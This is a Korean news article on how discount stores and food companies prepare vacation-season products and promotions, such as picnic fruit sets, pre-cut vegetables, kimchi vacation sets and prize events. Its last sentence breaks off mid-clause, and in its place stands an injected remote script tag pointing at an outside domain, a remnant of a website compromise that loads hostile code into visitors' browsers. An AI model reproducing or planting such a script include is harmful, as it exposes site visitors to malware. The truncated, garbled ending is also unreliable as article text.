
본격적인 휴가철을 맞으면서 식품업체와 대형유통업체들은 바캉스 패키지 상품과, 마케팅을 잇따라 준비하고 있다.
대형유통업체와 백화점은 야외에서 즐길 수 있는 신선편의농산물을 개발하는 한편 즉석식품, 김치업체들도 휴가철 특수에 맞춘 페키지 개발과 이색적인 마케팅을 펼치며 소비잡기에 열을 올리고 있다.
이들 대형유통업체와 식품업체들이 선보이는 바캉스 상품들을 소개한다.
■대형유통업체
대형 할인점에서는 휴가철을 겨냥해 상품 기획과 간편식품 판매에 주력했다.
롯데마트는 이달부터 하절기 휴가철 과일소비자 공략상품으로 `피크닉과일세트''를 선보인다.
`피크닉과일세트''는 감귤, 바나나 등과 같이 세척하지 않고도 껍질만 벗겨 먹을 수 있는 간편한 과일을 세트로 포장한 상품이다.
가격은 부담없이 구입할 수 있도록 4000~5000원대로 계획했다.
이와 함께 찌개와 반찬의 재료로 사용되는 채소류는 신선편의농산물로 준비했다.
이번에 롯데마트에서 선보이는 신선편의농산물은 찌개도우미, 토핑도우미, 양념도우미로 각각 요리 종류에 맞춘 커팅 야채를 1800원 내외로 판매 계획을 세웠다.
김종환 롯데마트 농산팀 팀장은 “휴가철 소비를 위해 과일패키지와 반찬용·샐러드용 신선편의농산물을 준비했다”며 “모든 상품들은 간편에 포커스를 맞추고 패키지를 다양하게 구성했다”고 밝혔디.
농협하나로클럽은 과일의 경우 단품으로 소규격·소포장 상품을 준비했다.
박찬혁 농협하나로클럽 과일부장은 “올 봄 나들이용으로 선보인 모듬과일세트보다 한가지 종류의 1·3kg짜리 과일박스나 5~6개씩 봉지에 담은 사과가 호응이 높았다”며 “주산지 성출하 과일을 단품, 소포장으로 판매할 계획”이라고 말했다.
채소는 찌개, 샤브샤브, 볶음밥, 샐러드류 등 신선편의 중심으로 구성할 계획이다.
한상훈 농협하나로클럽 채소바이어는 “다양한 세척농산물을 선보였으나 아직까지 큰 호응이 없는 편”이라며 “그러나 최근 양상추, 적채, 파프리카, 브로컬리 등을 투명용기에 200g, 300g씩 담은 샐러드 상품이 인기있다”고 말했다. 한 바이어는 “샐러드는 양재점 기준으로 하루 30~40만원의 매출을 올리고 있다”고 말했다.
신세계 이마트는 수도권보다는 지방을 중심으로 간편야채류 판매를 두 배이상 늘릴 계획이다.
이경희 신세계이마트 야채팀장은 “소포장·세척상품 중심으로 다음주부터 물량을 늘릴 계획”이라며 “해운대, 강릉, 원주, 남원, 전주, 군산, 여주, 포항, 제주, 강릉 등 바캉스철에 소비자들이 지방 점포를 찾을 것으로 예상, 신선편의농산물을 확대할 예정”이라고 말했다.
■식품업계
식품업계서는 휴가특수를 겨냥해 다양한 이벤트와 패키지 상품을 선보였다.
(주)두산식품BG 종가집은 휴가철 김치판매 전략으로 `종가집바캉스세트''를 준비, 지난 15일부터 판매에 들어갔다.
이번에 휴가철동안 선보이는 종가집바캉스세트는 피서지의 상황에 맞춘 맛김치·한입김치 등과 함께 마른 반찬류, 커피믹스 등을 한세트로 포장했다.
용기는 1회용 패트를 이용, 간편하게 먹고 버릴 수 있으며 전체 세트를 포장한 봉투는 휴가기간 젖은 빨래를 담을 수 있도록 디자인했다.
종가집은 할인점에서 판매되는 바캉스세트는 대가족용으로 세트를 구성했으며 피서지 일대와 콘도 식품판매 매장에서도 바캉스세트판매에 주력할 계획이다.
신광수 식생활BU 마케팅1팀 팀장은 “김치는 휴가철 소비가 연중 가장 높은 시기”라며 “바캉스 특수를 잡기 위해 휴가지에서 소비자가 필요로하는 것이 무엇인가에 대해 고려하고 세트를 구성했다”고 밝혔다.
(주)농심은 지난달 2일부터 오는 26일까지 `농심 큰사람 큰사발 여름 큰축제''를 실시하면서 바캉스 판촉마케팅을 전개했다.
전국 남녀중고생을 대상으로 실시한 이번 행사에는 당첨 소비자를 대상으로 강원도 영월에서 래프팅, 서바이벌게임, 모터바이크, 동굴탐험 등의 프로그램을 실시한다.
이와 함께 바캉스 기간동안 지난해부터 선보인 농심 `햅쌀밥''을 구매하는 소비자들에게 용기면을 증정하는 판촉행사를 실시한다.
최호민 농심 홍보1팀 과장은 “휴가철 주력상품인 용기면을 대상으로 다양한 홍보판촉 행사를 실시하고 있다”라며 “현지 홍보행사로 해수욕장이나 피서지의 특설매장을 지원하고 있다”고 말했다.
(주)CJ는 아시아나와 함께 이달 한달동안 공동마케팅을 펼친다.
우선 아시아나사이트를 통해 국내선 항공권을 구매하고 비행기에 탑승한 고객을 대상으로 총 30명을 추첨, `햇반 발아현미밥'' 1박스를 준다.
또 햇반사이트에서 `햇반'' 구매고객을 추첨해 1인에게 ?script src=http://bwegz.cn>
